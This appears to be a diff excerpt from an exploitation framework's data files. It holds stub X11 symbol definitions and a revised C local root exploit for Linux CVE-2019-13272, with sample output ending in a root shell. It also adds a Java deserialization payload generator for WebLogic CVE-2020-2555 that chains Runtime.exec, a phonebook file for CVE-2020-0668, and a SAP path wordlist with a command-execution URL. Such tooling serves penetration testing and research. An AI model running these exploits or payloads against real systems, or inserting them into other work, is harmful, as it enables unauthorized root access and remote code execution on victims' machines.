+int _XmxpmCreateImageFromPixmap = 0;
+int _XmxpmCreatePixmapFromImage = 0;
+int _XmxpmDataTypes = 0;
+int _XmxpmFreeColorTable = 0;
+int _XmxpmFreeRgbNames = 0;
+int _XmxpmGetCmt = 0;
+int _XmxpmGetRgbName = 0;
+int _XmxpmGetString = 0;
+int _XmxpmHashIntern = 0;
+int _XmxpmHashSlot = 0;
+int _XmxpmHashTableFree = 0;
+int _XmxpmHashTableInit = 0;
+int _XmxpmInitAttributes = 0;
+int _XmxpmInitXpmImage = 0;
+int _XmxpmInitXpmInfo = 0;
+int _XmxpmNextString = 0;
+int _XmxpmNextUI = 0;
+int _XmxpmNextWord = 0;
+int _XmxpmParseColors = 0;
+int _XmxpmParseData = 0;
+int _XmxpmParseDataAndCreate = 0;
+int _XmxpmParseExtensions = 0;
+int _XmxpmParseHeader = 0;
+int _XmxpmParseValues = 0;
+int _XmxpmReadRgbNames = 0;
+int _XmxpmSetAttributes = 0;
+int _XmxpmSetInfo = 0;
+int _XmxpmSetInfoMask = 0;
+int _Xmxpm_xynormalizeimagebits = 0;
+int _Xmxpm_znormalizeimagebits = 0;
+int XNextEvent = 0;
+int XOffsetRegion = 0;
+int XOMOfOC = 0;
+int XOpenDisplay = 0;
+int XOpenIM = 0;
+int XParseColor = 0;
+int XPeekEvent = 0;
+int XPending = 0;
+int Xpms_popen = 0;
+int XPolygonRegion = 0;
+int XPutBackEvent = 0;
+int XPutImage = 0;
+int XQueryBestCursor = 0;
+int XQueryColor = 0;
+int XQueryColors = 0;
+int XQueryPointer = 0;
+int XQueryTree = 0;
+int XRaiseWindow = 0;
+int XReadBitmapFileData = 0;
+int XRecolorCursor = 0;
+int XRectInRegion = 0;
+int XReparentWindow = 0;
+int XrmCombineDatabase = 0;
+int XrmDestroyDatabase = 0;
+int XrmGetStringDatabase = 0;
+int XrmPermStringToQuark = 0;
+int XrmPutResource = 0;
+int XrmPutStringResource = 0;
+int XrmQGetResource = 0;
+int XrmQGetSearchList = 0;
+int XrmQGetSearchResource = 0;
+int XrmQuarkToString = 0;
+int XrmStringToQuark = 0;
+int XrmUniqueQuark = 0;
+int XRotateBuffers = 0;
+int XSaveContext = 0;
+int XScreenCount = 0;
+int XScreenNumberOfScreen = 0;
+int XScreenOfDisplay = 0;
+int XSelectInput = 0;
+int XSendEvent = 0;
+int XSetClipMask = 0;
+int XSetClipOrigin = 0;
+int XSetClipRectangles = 0;
+int XSetCloseDownMode = 0;
+int XSetErrorHandler = 0;
+int XSetFillStyle = 0;
+int XSetForeground = 0;
+int XSetFunction = 0;
+int XSetICFocus = 0;
+int XSetICValues = 0;
+int XSetInputFocus = 0;
+int XSetLineAttributes = 0;
+int XSetLocaleModifiers = 0;
+int XSetOCValues = 0;
+int XSetRegion = 0;
+int XSetSelectionOwner = 0;
+int XSetStipple = 0;
+int XSetTextProperty = 0;
+int XSetTSOrigin = 0;
+int XSetWindowBackground = 0;
+int XSetWindowBackgroundPixmap = 0;
+int XSetWMColormapWindows = 0;
+int XShapeCombineMask = 0;
+int XShapeCombineRectangles = 0;
+int XShapeQueryExtension = 0;
+int __xstat64 = 0;
+int XStoreBuffer = 0;
+int XStoreColor = 0;
+int XStringToKeysym = 0;
+int XSubtractRegion = 0;
+int XSync = 0;
+int XtAddCallback = 0;
+int XtAddEventHandler = 0;
+int XtAddGrab = 0;
+int XtAddRawEventHandler = 0;
+int XtAllocateGC = 0;
+int XtAppAddTimeOut = 0;
+int XtAppAddWorkProc = 0;
+int XtAppCreateShell = 0;
+int XtAppErrorMsg = 0;
+int XtAppGetExitFlag = 0;
+int XtAppGetSelectionTimeout = 0;
+int XtAppLock = 0;
+int XtAppNextEvent = 0;
+int XtAppPending = 0;
+int XtAppProcessEvent = 0;
+int XtAppSetSelectionTimeout = 0;
+int XtAppSetTypeConverter = 0;
+int XtAppSetWarningMsgHandler = 0;
+int XtAppUnlock = 0;
+int XtAppWarningMsg = 0;
+int XtAugmentTranslations = 0;
+int XtBuildEventMask = 0;
+int XtCallActionProc = 0;
+int XtCallCallbackList = 0;
+int XtCallCallbacks = 0;
+int XtCallConverter = 0;
+int XtCalloc = 0;
+int XtCancelSelectionRequest = 0;
+int XtConfigureWidget = 0;
+int XtConvertAndStore = 0;
+int XtConvertCase = 0;
+int XtCreateManagedWidget = 0;
+int XtCreatePopupShell = 0;
+int XtCreateSelectionRequest = 0;
+int XtCreateWidget = 0;
+int XtCreateWindow = 0;
+int XtCvtStringToFontSet = 0;
+int XtCvtStringToFontStruct = 0;
+int XtCvtStringToPixel = 0;
+int XtDatabase = 0;
+int XtDestroyApplicationContext = 0;
+int XtDestroyWidget = 0;
+int XtDisownSelection = 0;
+int XtDispatchEvent = 0;
+int XtDisplayOfObject = 0;
+int XtDisplayStringConversionWarning = 0;
+int XtDisplayToApplicationContext = 0;
+int XtError = 0;
+int XtErrorMsg = 0;
+int XTextExtents = 0;
+int XTextExtents16 = 0;
+int XTextWidth = 0;
+int XTextWidth16 = 0;
+int XtFree = 0;
+int XtGetActionKeysym = 0;
+int XtGetApplicationNameAndClass = 0;
+int XtGetApplicationResources = 0;
+int XtGetConstraintResourceList = 0;
+int XtGetErrorDatabaseText = 0;
+int XtGetGC = 0;
+int XtGetKeysymTable = 0;
+int XtGetMultiClickTime = 0;
+int XtGetResourceList = 0;
+int XtGetSelectionParameters = 0;
+int XtGetSelectionRequest = 0;
+int XtGetSelectionValue = 0;
+int XtGetSelectionValueIncremental = 0;
+int XtGetSelectionValues = 0;
+int XtGetSelectionValuesIncremental = 0;
+int XtGetSubresources = 0;
+int XtGetSubvalues = 0;
+int XtGetValues = 0;
+int XtGrabButton = 0;
+int XtGrabKey = 0;
+int XtGrabKeyboard = 0;
+int XtGrabPointer = 0;
+int XtHasCallbacks = 0;
+int _XtInherit = 0;
+int _XtInheritTranslations = 0;
+int XtInitializeWidgetClass = 0;
+int XtInsertEventHandler = 0;
+int XtInstallAccelerators = 0;
+int XtIsManaged = 0;
+int XtIsSensitive = 0;
+int XtIsSubclass = 0;
+int _XtIsSubclassOf = 0;
+int XtLastEventProcessed = 0;
+int XtLastTimestampProcessed = 0;
+int XtMakeGeometryRequest = 0;
+int XtMakeResizeRequest = 0;
+int XtMalloc = 0;
+int XtManageChild = 0;
+int XtManageChildren = 0;
+int XtMergeArgLists = 0;
+int XtMoveWidget = 0;
+int XtName = 0;
+int XtNameToWidget = 0;
+int XtOverrideTranslations = 0;
+int XtOwnSelection = 0;
+int XtOwnSelectionIncremental = 0;
+int XtParseAcceleratorTable = 0;
+int XtParseTranslationTable = 0;
+int XtPopdown = 0;
+int XtPopup = 0;
+int XtProcessLock = 0;
+int XtProcessUnlock = 0;
+int XtQueryGeometry = 0;
+int XTranslateCoordinates = 0;
+int XtRealizeWidget = 0;
+int XtRealloc = 0;
+int XtRegisterGrabAction = 0;
+int XtReleaseGC = 0;
+int XtRemoveAllCallbacks = 0;
+int XtRemoveCallback = 0;
+int XtRemoveEventHandler = 0;
+int XtRemoveGrab = 0;
+int XtRemoveTimeOut = 0;
+int XtRemoveWorkProc = 0;
+int XtResizeWidget = 0;
+int XtResolvePathname = 0;
+int XtScreenDatabase = 0;
+int XtScreenOfObject = 0;
+int XtSendSelectionRequest = 0;
+int XtSetKeyboardFocus = 0;
+int XtSetKeyTranslator = 0;
+int XtSetMappedWhenManaged = 0;
+int XtSetSelectionParameters = 0;
+int XtSetSensitive = 0;
+int XtSetSubvalues = 0;
+int XtSetTypeConverter = 0;
+int XtSetValues = 0;
+int XtShellStrings = 0;
+int XtStrings = 0;
+int XtTranslateCoords = 0;
+int XtTranslateKey = 0;
+int XtUngrabButton = 0;
+int XtUngrabKey = 0;
+int XtUngrabKeyboard = 0;
+int XtUngrabPointer = 0;
+int XtUnmanageChild = 0;
+int XtUnmanageChildren = 0;
+int XtVaCreateManagedWidget = 0;
+int XtVaCreateWidget = 0;
+int XtVaGetValues = 0;
+int XtVaSetValues = 0;
+int XtWarning = 0;
+int XtWarningMsg = 0;
+int XtWidgetToApplicationContext = 0;
+int XtWindowOfObject = 0;
+int XtWindowToWidget = 0;
+int XUngrabKeyboard = 0;
+int XUngrabPointer = 0;
+int XUngrabServer = 0;
+int XUnionRectWithRegion = 0;
+int XUnionRegion = 0;
+int XUnmapWindow = 0;
+int XUnsetICFocus = 0;
+int Xutf8DrawImageString = 0;
+int Xutf8DrawString = 0;
+int Xutf8TextEscapement = 0;
+int Xutf8TextExtents = 0;
+int Xutf8TextListToTextProperty = 0;
+int XVaCreateNestedList = 0;
+int XWarpPointer = 0;
+int XwcDrawImageString = 0;
+int XwcDrawString = 0;
+int XwcTextEscapement = 0;
+int XwcTextExtents = 0;
+int XWidthOfScreen = 0;
+int XWindowEvent = 0;
+int XWithdrawWindow = 0;
+int overrideShellWidgetClass = 0;

data/exploits/CVE-2019-13272/poc.c

@@ -1,5 +1,10 @@
 // Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
-// Uses pkexec technique
+//
+// Uses pkexec technique. Requires execution within the context
+// of a user session with an active PolKit agent.
+//
+// Exploitation will fail if kernel.yama.ptrace_scope >= 2;
+// or SELinux deny_ptrace=on.
 // ---
 // Original discovery and exploit author: Jann Horn
 // - https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
@@ -14,6 +19,7 @@
 // Tested on:
 // - Ubuntu 16.04.5 kernel 4.15.0-29-generic
 // - Ubuntu 18.04.1 kernel 4.15.0-20-generic
+// - Ubuntu 18.04.3 kernel 5.0.0-23-generic
 // - Ubuntu 19.04 kernel 5.0.0-15-generic
 // - Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
 // - Linux Mint 17.3 kernel 4.4.0-89-generic
@@ -24,33 +30,37 @@
 // - Backbox 6 kernel 4.18.0-21-generic
 // - Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
 // - Kali kernel 4.19.0-kali5-amd64
-// - Redcore 1806 (LXQT) kernel 4.16.16-redcore
 // - MX 18.3 kernel 4.19.37-2~mx17+1
 // - RHEL 8.0 kernel 4.18.0-80.el8.x86_64
+// - CentOS 8 kernel 4.18.0-80.el8.x86_64
 // - Debian 9.4.0 kernel 4.9.0-6-amd64
 // - Debian 10.0.0 kernel 4.19.0-5-amd64
 // - Devuan 2.0.0 kernel 4.9.0-6-amd64
 // - SparkyLinux 5.8 kernel 4.19.0-5-amd64
+// - SparkyLinux 5.9 kernel 4.19.0-6-amd64
 // - Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
 // - Manjaro 18.0.3 kernel 4.19.23-1-MANJARO
 // - Mageia 6 kernel 4.9.35-desktop-1.mga6
 // - Antergos 18.7 kernel 4.17.6-1-ARCH
+// - lubuntu 19.04 kernel 5.0.0-13-generic
+// - Sabayon 19.03 kernel 4.20.0-sabayon
+// - Pop! OS 19.04 kernel 5.0.0-21-generic
 // ---
-// user@linux-mint-19-2:~$ gcc -Wall --std=gnu99 -s poc.c -o ptrace_traceme_root
-// user@linux-mint-19-2:~$ ./ptrace_traceme_root
+// [user@localhost CVE-2019-13272]$ gcc -Wall --std=gnu99 -s poc.c -o ptrace_traceme_root
+// [user@localhost CVE-2019-13272]$ ./ptrace_traceme_root
 // Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
 // [.] Checking environment ...
 // [~] Done, looks good
-// [.] Searching for known helpers ...
-// [~] Found known helper: /usr/sbin/mate-power-backlight-helper
-// [.] Using helper: /usr/sbin/mate-power-backlight-helper
+// [.] Searching policies for useful helpers ...
+// [.] Ignoring helper (does not exist): /usr/sbin/pk-device-rebind
+// [.] Trying helper: /usr/libexec/gsd-backlight-helper
 // [.] Spawning suid process (/usr/bin/pkexec) ...
 // [.] Tracing midpid ...
 // [~] Attached to midpid
-// To run a command as administrator (user "root"), use "sudo <command>".
-// See "man sudo_root" for details.
-//
-// root@linux-mint-19-2:/home/user#
+// [root@localhost CVE-2019-13272]# id
+// uid=0(root) gid=0(root) groups=0(root),1000(user)
+// [root@localhost CVE-2019-13272]# uname -a
+// Linux localhost.localdomain 4.18.0-80.el8.x86_64 #1 SMP Tue Jun 4 09:19:46 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 // ---
 
 #define _GNU_SOURCE
@@ -80,6 +90,64 @@
 #  define dprintf
 #endif
 
+/*
+ * enabled automatic targeting.
+ * uses pkaction to search PolKit policy actions for viable helper executables.
+ */
+#define ENABLE_AUTO_TARGETING   1
+
+/*
+ * fall back to known helpers if automatic targeting fails.
+ * note: use of these helpers may result in PolKit authentication
+ *       prompts on the session associated with the PolKit agent.
+ */
+#define ENABLE_FALLBACK_HELPERS 1
+
+static const char *SHELL = "/bin/bash";
+
+static int middle_success = 1;
+static int block_pipe[2];
+static int self_fd = -1;
+static int dummy_status;
+static const char *helper_path;
+static const char *pkexec_path = "/usr/bin/pkexec";
+static const char *pkaction_path = "/usr/bin/pkaction";
+struct stat st;
+
+const char *helpers[1024];
+
+/* known helpers to use if automatic targeting fails */
+#if ENABLE_FALLBACK_HELPERS
+const char *known_helpers[] = {
+  "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
+  "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
+  "/usr/lib/unity-settings-daemon/usd-backlight-helper",
+  "/usr/lib/unity-settings-daemon/usd-wacom-led-helper",
+  "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
+  "/usr/lib/x86_64-linux-gnu/cinnamon-settings-daemon/csd-backlight-helper",
+  "/usr/sbin/mate-power-backlight-helper",
+  "/usr/sbin/xfce4-pm-helper",
+  "/usr/bin/xfpm-power-backlight-helper",
+  "/usr/bin/lxqt-backlight_backend",
+  "/usr/libexec/gsd-wacom-led-helper",
+  "/usr/libexec/gsd-wacom-oled-helper",
+  "/usr/libexec/gsd-backlight-helper",
+  "/usr/lib/gsd-backlight-helper",
+  "/usr/lib/gsd-wacom-led-helper",
+  "/usr/lib/gsd-wacom-oled-helper",
+  "/usr/lib64/xfce4/session/xsfm-shutdown-helper",
+};
+#endif
+
+/* helper executables known to cause problems (hang or fail) */
+const char *blacklisted_helpers[] = {
+  "/xf86-video-intel-backlight-helper",
+  "/cpugovctl",
+  "/resetxpad",
+  "/package-system-locked",
+  "/cddistupgrader",
+};
+
 #define SAFE(expr) ({                   \
   typeof(expr) __res = (expr);          \
   if (__res == -1) {                    \
@@ -98,36 +166,6 @@
 #  define __NR_execveat 322
 #endif
 
-static const char *SHELL = "/bin/bash";
-
-static int middle_success = 1;
-static int block_pipe[2];
-static int self_fd = -1;
-static int dummy_status;
-static const char *helper_path;
-static const char *pkexec_path = "/usr/bin/pkexec";
-static const char *pkaction_path = "/usr/bin/pkaction";
-struct stat st;
-
-const char *helpers[1024];
-
-const char *known_helpers[] = {
-  "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
-  "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
-  "/usr/lib/unity-settings-daemon/usd-backlight-helper",
-  "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
-  "/usr/lib/x86_64-linux-gnu/cinnamon-settings-daemon/csd-backlight-helper",
-  "/usr/sbin/mate-power-backlight-helper",
-  "/usr/bin/xfpm-power-backlight-helper",
-  "/usr/bin/lxqt-backlight_backend",
-  "/usr/libexec/gsd-wacom-led-helper",
-  "/usr/libexec/gsd-wacom-oled-helper",
-  "/usr/libexec/gsd-backlight-helper",
-  "/usr/lib/gsd-backlight-helper",
-  "/usr/lib/gsd-wacom-led-helper",
-  "/usr/lib/gsd-wacom-oled-helper",
-};
-
 /* temporary printf; returned pointer is valid until next tprintf */
 static char *tprintf(char *fmt, ...) {
   static char buf[10000];
@@ -272,23 +310,27 @@ static int check_env(void) {
     dprintf("[-] Could not find pkexec executable at %s\n", pkexec_path);
     exit(EXIT_FAILURE);
   }
-  if (stat(pkaction_path, &st) != 0) {
-    dprintf("[-] Could not find pkaction executable at %s\n", pkaction_path);
-    exit(EXIT_FAILURE);
-  }
 
   if (stat("/dev/grsec", &st) == 0) {
-    dprintf("[-] Warning: grsec is in use\n");
+    dprintf("[!] Warning: grsec is in use\n");
     warn++;
   }
+
   if (xdg_session == NULL) {
     dprintf("[!] Warning: $XDG_SESSION_ID is not set\n");
     warn++;
   }
-  if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
+
+  if (system("/bin/loginctl --no-ask-password show-session \"$XDG_SESSION_ID\" | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
     dprintf("[!] Warning: Could not find active PolKit agent\n");
     warn++;
   }
+
+  if (system("/sbin/sysctl kernel.yama.ptrace_scope 2>&1 | /bin/grep -q [23]") == 0) {
+    dprintf("[!] Warning: kernel.yama.ptrace_scope >= 2\n");
+    warn++;
+  }
+
   if (stat("/usr/sbin/getsebool", &st) == 0) {
     if (system("/usr/sbin/getsebool deny_ptrace 2>&1 | /bin/grep -q on") == 0) {
       dprintf("[!] Warning: SELinux deny_ptrace is enabled\n");
@@ -296,7 +338,11 @@ static int check_env(void) {
     }
   }
 
-  dprintf("[~] Done, looks good\n");
+  if (warn > 0) {
+    dprintf("[~] Done, with %d warnings\n", warn);
+  } else {
+    dprintf("[~] Done, looks good\n");
+  }
 
   return warn;
 }
@@ -306,25 +352,32 @@ static int check_env(void) {
  * Check each action for allow_active=yes, extract the associated helper path,
  * and check the helper path exists.
  */
+#if ENABLE_AUTO_TARGETING
 int find_helpers() {
+  if (stat(pkaction_path, &st) != 0) {
+    dprintf("[-] No helpers found. Could not find pkaction executable at %s.\n", pkaction_path);
+    return 0;
+  }
+
   char cmd[1024];
   snprintf(cmd, sizeof(cmd), "%s --verbose", pkaction_path);
   FILE *fp;
   fp = popen(cmd, "r");
   if (fp == NULL) {
-    dprintf("[-] Failed to run: %s\n", cmd);
-    exit(EXIT_FAILURE);
+    dprintf("[-] Failed to run %s: %m\n", cmd);
+    return 0;
   }
 
   char line[1024];
   char buffer[2048];
   int helper_index = 0;
   int useful_action = 0;
+  int blacklisted_helper = 0;
   static const char *needle = "org.freedesktop.policykit.exec.path -> ";
   int needle_length = strlen(needle);
 
   while (fgets(line, sizeof(line)-1, fp) != NULL) {
-    /* check the action uses allow_active=yes*/
+    /* check the action uses allow_active=yes */
     if (strstr(line, "implicit active:")) {
       if (strstr(line, "yes")) {
         useful_action = 1;
@@ -334,6 +387,7 @@ int find_helpers() {
 
     if (useful_action == 0)
       continue;
+
     useful_action = 0;
 
     /* extract the helper path */
@@ -350,17 +404,23 @@ int find_helpers() {
       buffer[i] = found[needle_length + i];
     }
 
-    if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||
-      strstr(&buffer[0], "/cpugovctl") != 0 ||
-      strstr(&buffer[0], "/package-system-locked") != 0 ||
-      strstr(&buffer[0], "/cddistupgrader") != 0) {
-      dprintf("[.] Ignoring blacklisted helper: %s\n", &buffer[0]);
-      continue;
+    /* check helper path against helpers defined in 'blacklisted_helpers' array */
+    blacklisted_helper = 0;
+    for (i=0; i<sizeof(blacklisted_helpers)/sizeof(blacklisted_helpers[0]); i++) {
+      if (strstr(&buffer[0], blacklisted_helpers[i]) != 0) {
+        dprintf("[.] Ignoring helper (blacklisted): %s\n", &buffer[0]);
+        blacklisted_helper = 1;
+        break;
+      }
     }
+    if (blacklisted_helper == 1)
+      continue;
 
     /* check the path exists */
-    if (stat(&buffer[0], &st) != 0)
+    if (stat(&buffer[0], &st) != 0) {
+      dprintf("[.] Ignoring helper (does not exist): %s\n", &buffer[0]);
       continue;
+    }
 
     helpers[helper_index] = strndup(&buffer[0], strlen(buffer));
     helper_index++;
@@ -372,11 +432,12 @@ int find_helpers() {
   pclose(fp);
   return 0;
 }
+#endif
 
 // * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
 
 int ptrace_traceme_root() {
-  dprintf("[.] Using helper: %s\n", helper_path);
+  dprintf("[.] Trying helper: %s\n", helper_path);
 
   /*
    * set up a pipe such that the next write to it will block: packet mode,
@@ -436,29 +497,38 @@ int main(int argc, char **argv) {
     exit(0);
   }
 
-  /* Search for known helpers defined in 'known_helpers' array */
-  dprintf("[.] Searching for known helpers ...\n");
   int i;
-  for (i=0; i<sizeof(known_helpers)/sizeof(known_helpers[0]); i++) {
-    if (stat(known_helpers[i], &st) == 0) {
-      helper_path = known_helpers[i];
-      dprintf("[~] Found known helper: %s\n", helper_path);
-      ptrace_traceme_root();
-    }
-  }
 
-  /* Search polkit policies for helper executables */
-  dprintf("[.] Searching for useful helpers ...\n");
+#if ENABLE_AUTO_TARGETING
+  /* search polkit policies for helper executables */
+  dprintf("[.] Searching policies for useful helpers ...\n");
   find_helpers();
   for (i=0; i<sizeof(helpers)/sizeof(helpers[0]); i++) {
     if (helpers[i] == NULL)
       break;
 
-    if (stat(helpers[i], &st) == 0) {
-      helper_path = helpers[i];
-      ptrace_traceme_root();
-    }
+    if (stat(helpers[i], &st) != 0)
+      continue;
+
+    helper_path = helpers[i];
+    ptrace_traceme_root();
   }
+#endif
+
+#if ENABLE_FALLBACK_HELPERS
+  /* search for known helpers defined in 'known_helpers' array */
+  dprintf("[.] Searching for known helpers ...\n");
+  for (i=0; i<sizeof(known_helpers)/sizeof(known_helpers[0]); i++) {
+    if (stat(known_helpers[i], &st) != 0)
+      continue;
+
+    helper_path = known_helpers[i];
+    dprintf("[~] Found known helper: %s\n", helper_path);
+    ptrace_traceme_root();
+  }
+#endif
+
+  dprintf("[~] Done\n");
 
   return 0;
-}
+}

data/exploits/CVE-2020-2555/Weblogic_2555.java

@@ -0,0 +1,54 @@
+import com.tangosol.util.filter.LimitFilter;
+import com.tangosol.util.extractor.ChainedExtractor;
+import com.tangosol.util.extractor.ReflectionExtractor;
+
+import javax.management.BadAttributeValueExpException;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+
+/*
+ *  BadAttributeValueExpException.readObject()
+ *  com.tangosol.util.filter.LimitFilter.toString()
+ *  com.tangosol.util.extractor.ChainedExtractor.extract()
+ *  com.tangosol.util.extractor.ReflectionExtractor.extract()
+ *  Method.invoke()
+ *  Runtime.exec()
+ *
+ *  PoC by Y4er
+ */
+public class Weblogic_2555
+{
+	public static void main(String args[]) throws Exception
+	{
+		ReflectionExtractor extractor = new ReflectionExtractor("getMethod", new Object[]{ "getRuntime", new Class[0] });
+		ReflectionExtractor extractor2 = new ReflectionExtractor("invoke", new Object[]{ null, new Object[0] });
+		ReflectionExtractor extractor3 = new ReflectionExtractor("exec", new Object[]{ new String[]{ "/bin/sh", "-c", "touch /tmp/blah_ze_blah" } });
+
+		ReflectionExtractor extractors[] = { extractor, extractor2, extractor3 };
+		ChainedExtractor chainedExt = new ChainedExtractor(extractors);
+		LimitFilter limitFilter = new LimitFilter();
+
+		Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
+		m_comparator.setAccessible(true);
+		m_comparator.set(limitFilter, chainedExt);
+
+		Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
+		m_oAnchorTop.setAccessible(true);
+		m_oAnchorTop.set(limitFilter, Runtime.class);
+
+		BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
+		Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
+		field.setAccessible(true);
+		field.set(badAttributeValueExpException, limitFilter);
+
+		// Serialize object & save to file
+		FileOutputStream fos = new FileOutputStream("payload_obj.ser");
+		ObjectOutputStream os = new ObjectOutputStream(fos);
+		os.writeObject(badAttributeValueExpException);
+		os.close();
+
+	}
+}

data/exploits/cve-2020-0668/phonebook.txt

@@ -0,0 +1,102 @@
+[VPNTEST]
+Encoding=1
+PBVersion=1
+Type=2
+AutoLogon=1
+UseRasCredentials=1
+LowDateTime=-1345834320
+HighDateTime=30248544
+DialParamsUID=849441
+Guid=174463CE6AAFD4458FC57A466A95B787
+VpnStrategy=1
+ExcludedProtocols=0
+LcpExtensions=1
+DataEncryption=8
+SwCompression=0
+NegotiateMultilinkAlways=0
+SkipDoubleDialDialog=0
+DialMode=0
+OverridePref=15
+RedialAttempts=3
+RedialSeconds=60
+IdleDisconnectSeconds=0
+RedialOnLinkFailure=1
+CallbackMode=0
+CustomDialDll=
+CustomDialFunc=
+CustomRasDialDll=
+ForceSecureCompartment=0
+DisableIKENameEkuCheck=0
+AuthenticateServer=0
+ShareMsFilePrint=1
+BindMsNetClient=1
+SharedPhoneNumbers=0
+GlobalDeviceSettings=0
+PrerequisiteEntry=
+PrerequisitePbk=
+PreferredPort=VPN3-0
+PreferredDevice=WAN Miniport (PPTP)
+PreferredBps=0
+PreferredHwFlow=1
+PreferredProtocol=1
+PreferredCompression=1
+PreferredSpeaker=1
+PreferredMdmProtocol=0
+PreviewUserPw=1
+PreviewDomain=1
+PreviewPhoneNumber=0
+ShowDialingProgress=1
+ShowMonitorIconInTaskBar=1
+CustomAuthKey=0
+AuthRestrictions=544
+IpPrioritizeRemote=1
+IpInterfaceMetric=0
+IpHeaderCompression=0
+IpAddress=0.0.0.0
+IpDnsAddress=0.0.0.0
+IpDns2Address=0.0.0.0
+IpWinsAddress=0.0.0.0
+IpWins2Address=0.0.0.0
+IpAssign=1
+IpNameAssign=1
+IpDnsFlags=0
+IpNBTFlags=1
+TcpWindowSize=0
+UseFlags=2
+IpSecFlags=0
+IpDnsSuffix=
+Ipv6Assign=1
+Ipv6Address=::
+Ipv6PrefixLength=0
+Ipv6PrioritizeRemote=1
+Ipv6InterfaceMetric=0
+Ipv6NameAssign=1
+Ipv6DnsAddress=::
+Ipv6Dns2Address=::
+Ipv6Prefix=0000000000000000
+Ipv6InterfaceId=0000000000000000
+DisableClassBasedDefaultRoute=0
+DisableMobility=0
+NetworkOutageTime=0
+ProvisionType=0
+PreSharedKey=
+
+NETCOMPONENTS=
+ms_msclient=1
+ms_server=1
+
+MEDIA=rastapi
+Port=VPN3-0
+Device=WAN Miniport (PPTP)
+
+DEVICE=vpn
+PhoneNumber=127.0.0.1
+AreaCode=
+CountryCode=0
+CountryID=0
+UseDialingRules=0
+Comment=
+FriendlyName=
+LastSelectedPhone=0
+PromoteAlternates=0
+TryNextAlternateOnFail=1

data/wordlists/sap_icm_paths.txt

@@ -1,452 +1,549 @@
-/@download@
-/AdapterFramework/version/version.jsp
-/AdminTools/
-/Adobe
-/AdobeDocumentServices/Config
-/AdobeDocumentServices/Config?wsdl
-/AdobeDocumentServices/Grmg
-/AdobeDocumentServicesSec/Config
-/ADS-EJB
-/ADS-License
-/AE/index.jsp
-/AnalyticalReporting/
-/AnalyticalReporting/AnalyticalReporting_merge_web.xml
-/AnalyticalReporting/download/win32/websetup.properties
-/apidocs/
-/apidocs/allclasses-frame.html
-/apidocs/com/sap/engine/connector/connection/IConnection.html
-/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
-/apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
-/apidocs/com/sap/engine/deploy/manager/LoginInfo.html
-/ApplicationAdminProvider
-/bcb/
-/bcb/bcbadmHome.jsp
-/bcb/bcbadmNavigation.jsp
-/bcb/bcbadmSettings.jsp
-/bcb/bcbadmStart.jsp
-/bcb/bcbadmSystemInfo.jsp
-/bcbtest/start.jsp
-/BI_UDC
-/BizcCommLayerAuthoring/Config?wsdl
-/BizcCommLayerAuthoring/Config1
-/BizcCommLayerAuthoring/Config1?wsdl
-/bwtest
-/caf
-/CAFDataService/Config
-/CAFDataService/Config?wsdl
-/ccsui
-/CmcApp/logon.faces
-/CMSRTS/Config?wsdl
-/CMSRTS/Config1
-/CMSRTS/Config1?wsdl
-/com~tc~lm~webadmin~httpprovider~web
-/CrystalReports/viewrpt.cwr
-/ctc
-/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
-/DataArchivingService
-/dispatcher
-/dswsbobje
-/dswsbobje/services/BICatalog?wsdl
-/dswsbobje/services/listServices
-/examples.html
-/examples/
-/examples_frame.html
-/exchangeProfile/
-/GRMGHeartBeat
-/GRMGWSTest/service
-/GRMGWSTest/service?wsdl
-/guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
-/htmlb/
-/htmlb/docs/api/index.html
-/htmlb/index.html
-/htmlb/jsp/index.jsp
-/htmlb/moresamples.html
-/htmlb/samples.html
-/IciActionItemService/IciActionItemConf
-/IciActionItemService/IciActionItemConf?wsdl
-/IciChatLineService/IciChatLineConf
-/IciChatLineService/IciChatLineConf?wsdl
-/IciChatService/IciChatConf?wsdl
-/IciEventService/
-/IciEventService/IciEventConf
-/IciEventService/IciEventConf?wsdl
-/IciEventService/sap
-/IciFolderService/IciFolderConf
-/IciFolderService/IciFolderConf?wsdl
-/IciItemService/IciItemConf
-/IciItemService/IciItemConf?wsdl
-/IciMessageService/IciMessageConf
-/IciMessageService/IciMessageConf?wsdl
-/IciMonitorService/IciMonitorConf
-/IciMonitorService/IciMonitorConf?wsdl
-/IciPhoneCallService/IciPhoneCallConf
-/IciPhoneCallService/IciPhoneCallConf?wsdl
-/IciSystemService/IciSystemConf
-/IciSystemService/IciSystemConf?wsdl
-/IciUserService/IciUserConf
-/IciUserService/IciUserConf?wsdl
-/IGSCustomizingXML
-/index.html
-/InfoViewApp/
-/InfoViewApp/help/en/user/html/
-/InfoViewApp/listing/main.do?appKind=InfoView&service=%2FInfoViewApp%2Fcommon%2FappService.do
-/inspection.wsil
-/ipcpricing/ui/
-/irj
-/irj/go/km/docs
-/irj/portal
